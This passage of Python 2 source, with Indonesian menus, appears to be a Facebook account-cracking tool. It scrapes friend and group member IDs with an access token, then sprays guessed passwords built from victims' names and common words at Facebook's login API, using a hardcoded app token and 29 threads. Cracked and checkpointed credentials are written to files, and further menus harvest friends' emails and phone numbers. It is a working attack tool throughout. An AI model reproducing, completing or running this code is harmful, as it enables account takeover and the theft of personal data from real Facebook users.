'\xe2\x95\x91\x1b[1;93m[\x1b[1;93m\xe2\x9c\x93\x1b[1;93m]\x1b[1;93m Followers \x1b[1;93m: \x1b[1;92m' + sub + (33 - len(sub)) * '\x1b[1;93m ' + '║' print '\x1b[1;93m╠' + 50* '\xe2\x95\x90' + '║' print '║-» \x1b[1;36;49m1. Auto Crack \x1b[1;93m║' print '║-» \x1b[1;36;49m2. Manual Crack \x1b[1;93m║' print '║-» \x1b[1;36;49m3. Id Group \x1b[1;93m║' print '║-» \x1b[1;36;49m4. Ambil ID/Email/Hp Teman \x1b[1;93m║' print '║-» \x1b[1;36;49m5. Ganti Akun \x1b[1;93m║' print '║-» \x1b[1;36;49m0. Keluar \x1b[1;93m║' print '\x1b[1;93m╠' + 50* '\xe2\x95\x90' + '╝' pilih() def pilih(): zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;93m ') if zedd == '': print "\x1b[1;91m[!] Can't empty" pilih() else: if zedd == '1': autocrack() else: if zedd == '2': manualcrack() else: if zedd == '3': group() else: if zedd == '4': grab() else: if zedd == '5': os.system('rm -rf login.txt') keluar() else: if zedd == '0': keluar() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel' pilih() def autocrack(): global toket os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print '\x1b[1;93m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗' print '\xe2\x95\x91\x1b\xe2\x9c\x93\x1b[1;93m{Menu Crack} \x1b[1;93m ║' print '\x1b[1;93m╠' + 50 * '\xe2\x95\x90' + '╝' print '║-> \x1b[1;93m 1. Crack from Friends' print '║-> \x1b[1;93m 2. Crack from Group' print '║-> \x1b[1;31;40m 0. Kembali' print '\x1b[1;93m║' pilih_super() def pilih_super(): peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if peak == '': print '\x1b[1;91m[!] 
Jangan kosong' pilih_super() else: if peak == '1': os.system('clear') print logo print 55 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) for s in z['data']: id.append(s['id']) else: if peak == '2': os.system('clear') print logo print 55 * '\x1b[1;97m\xe2\x95\x90' idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/' + idg + '?access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName Friend \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') super() re = requests.get('https://graph.facebook.com/' + idg + '/friends?access_token=' + toket) s = json.loads(re.text) for i in s['data']: id.append(i['id']) else: if peak == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada' pilih_super() print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str(len(id)) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack' print 55 * '\x1b[1;97m\xe2\x95\x90' sys.stdout.flush() def main(arg): user = arg try: a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket) b = json.loads(a.text) pass1 = b['first_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|'+ pass1+'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;93m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass1 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass2 = b['first_name'] + '1234' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass2 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;93m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass2 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass3 = b['first_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass3 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;93m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass3 
+'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass4 = b['first_name'] + '12356' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass4 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;93m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass4 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass5 = b['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass5 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;93m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass5 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass6 = b['last_name'] + '1234' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass6 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;93m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass6 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass7 = b['last_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass7 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass7 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass7 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass8 = b['last_name'] + '123456' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass8 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass8 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass8 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass9 = 'sayang' 
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass9 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass9 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass9 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass10 = 'anjing' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass10 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +'|' + pass10 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +'|' + pass10 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass11 = 'bangsat' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass11 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +' | ' + pass11 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass11 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass12 = 'freefire' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass12 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +' | ' + pass12 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass12 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass13 = 'doraemon' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass13 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +' | ' + pass13 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass13 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass14 = 'januari' data = 
urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass14 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +' | ' + pass14 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass14 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass15 = 'password', data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass15 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +' | ' + pass15 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass15 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass16 = 'persija123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass16 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +' | ' + pass16 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass16 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass17 = 'indonesia' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass17 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +' | ' + pass17 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass17 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass18 = 'tidakada' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass18 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user +' | ' + pass18 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass18 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass19 = b['first_name'] + b['last_name'] data = 
urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass19 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;92m] ' + user + ' | ' + pass19 +' ==> ' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;93m] ' + user +' | ' + pass19 +' ==> ' + b['name'] else: pass20 = b['first_name'] + b['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass20 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;97m] ' + user +' | ' + pass20 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;97m] ' + user +' | ' + pass20 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: pass21 = b['first_name'] + b['last_name'] + '1234' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass20 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mBerhasil\xe2\x9c\x93\x1b[1;97m] ' + user +' | ' + pass21 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCekpoint\xe2\x9c\x9a\x1b[1;97m] ' + user +' | ' + pass21 +'==>' + b['name'] print 55 * '\x1b[1;97m\xe2\x95\x90' except: pass p = ThreadPool(29) p.map(main, id) print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') autocrack() def manualcrack(): global file global idlist global passw os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;93m*SILAHKAN AMBIL KUMPULAN ID FACEBOOK TERLEBIH DAHULU*' print 52 * '\x1b[1;97m\xe2\x95\x90' idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword Crack Contoh(sayang) \x1b[1;91m: \x1b[1;97m') try: file = open(idlist, 'r') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') for x in range(40): zedd = threading.Thread(target=scrak, args=()) zedd.start() threads.append(zedd) for zedd in threads: zedd.join() except IOError: print '\x1b[1;91m[!] 
File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu() def scrak(): global back global berhasil global cekpoint global gagal global up try: buka = open(idlist, 'r') up = buka.read().split() while file: username = file.readline().strip() url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = urllib.urlopen(url) mpsh = json.load(data) if back == len(up): break if 'access_token' in mpsh: bisa = open('Berhasil.txt', 'w') bisa.write(username + ' | ' + passw + '\n') bisa.close() berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: if 'www.facebook.com' in mpsh['error_msg']: cek = open('Cekpoint.txt', 'w') cek.write(username + ' | ' + passw + '\n') cek.close() cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: gagal.append(username) back += 1 sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint))) sys.stdout.flush() except IOError: print '\n\x1b[1;91m[!] Connection busy' time.sleep(1) except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' def hasil(): print print 52 * '\x1b[1;97m\xe2\x95\x90' for b in berhasil: print b for c in cekpoint: print c print print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal)) keluar() def group(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' try: uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket) gud = json.loads(uh.text) for p in gud['data']: nama = p['name'] id = p['id'] f = open('grupid.txt', 'w') listgrup.append(id) f.write(id + '\n') print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + str(nama) print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id) print 40 * '\x1b[1;97m=' print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Grup \x1b[1;96m%s' % len(listgrup) print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m: \x1b[1;97mgrupid.txt' f.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu() except KeyError: os.remove('grupid.txt') print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu() def grab(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] 
Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Ambil ID Dari Teman' print '║-> \x1b[1;37;40m2. Ambil ID Teman Dari Teman' print '║-> \x1b[1;37;40m3. Ambil ID Dari Grup' print '║-> \x1b[1;37;40m4. Ambil Email Dari Teman' print '║-> \x1b[1;37;40m5. Ambil Email Teman Dari Teman' print '║-> \x1b[1;37;40m6. Ambil No Hp Dari Teman' print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends' print '║-> \x1b[1;31;40m0. Kembali' print '\x1b[1;37;40m║' grab_pilih() def grab_pilih(): cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if cuih == '': print '\x1b[1;91m[!] Can\'t empty' grab_pilih() else: if cuih == '1': id_friends() else: if cuih == '2': idfrom_friends() else: if cuih == '3': id_member_grup() else: if cuih == '4': email() else: if cuih == '5': emailfrom_friends() else: if cuih == '6': nomor_hp() else: if cuih == '7': hpfrom_friends() else: if cuih == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found' grab_pilih() def id_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_id, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for ah in z['data']: idfriends.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_id bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(save_id) print '\x1b[1;91m[!] An error occurred' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def idfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] 
